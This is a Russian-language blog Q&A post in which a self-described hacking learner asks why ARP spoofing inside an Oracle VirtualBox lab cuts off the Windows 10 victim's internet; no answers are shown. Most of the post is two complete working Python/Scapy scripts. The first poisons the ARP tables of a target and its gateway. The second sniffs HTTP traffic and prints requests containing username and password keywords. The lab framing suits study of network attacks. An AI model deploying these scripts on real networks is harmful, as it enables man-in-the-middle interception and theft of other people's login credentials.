БЛОГ НА HUSL


Проблемы при попытке arp_spoofing-а на Oracle VirtualBox

Автор вопроса: Чибинёв Валентин

Я изучаю хакинг. У меня две программы на гостевой ОС Kali Linux. Их надо запускать одновременно, но при попытке sniff-ить трафик из гостевой ОС Windows 10 в Kali, интернет в Windows 10 пропадает, и сниффить не получается. Вот листинг программ:

arp_spoof.py
#!/usr/bin/env python
import time
import sys
import scapy.all as scapy


def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
    return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)

def restore(destination_ip, source_ip):
    destination_mac = get_mac(destination_ip)
    source_mac = get_mac(source_ip)
    packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac)
    scapy.send(packet, count=4, verbose=False)


target_ip = "10.0.2.6"
gateway_ip = "10.0.2.1"

try:
    sent_packets_count = 0
    while True:
        spoof(target_ip, gateway_ip)
        spoof(gateway_ip, target_ip)
        sent_packets_count += 2
        print("\r[+] Send two packets " + str(sent_packets_count), end="")
        sys.stdout.flush()
        time.sleep(2)
except KeyboardInterrupt:
    print("[+] Detected Ctrl + C ..... Reseting ARP tables .... Please wait.\n")
    restore(target_ip, gateway_ip)
    restore(gateway_ip, target_ip)

packet_sniffer.py
#!/usr/bin/env python
import scapy.all as scapy
from scapy.layers import http

def sniff(interface):
    scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)

def get_url(packet):
    return str(packet[http.HTTPRequest].Host) + str(packet[http.HTTPRequest].Path)

def get_login_info(packet):
    if packet.haslayer(scapy.Raw):
        load = packet[scapy.Raw].load ###
        keywords = ["username", "user", "login", "password", "pass", "pwd"]
        for keyword in keywords:
            if keyword in str(load):
                return load
              
def process_sniffed_packet(packet):
    if packet.haslayer(http.HTTPRequest):
        url = get_url(packet)
        print("[+] HTTP Request >> " + url)
        login_info = get_login_info(packet)
        if login_info:
            print("\n\n[+] Possible username/password > " + str(login_info) + "\n\n")

sniff("eth0")

Источник

Ответы (0 шт):

licensed under cc by-sa 3.0 with attribution.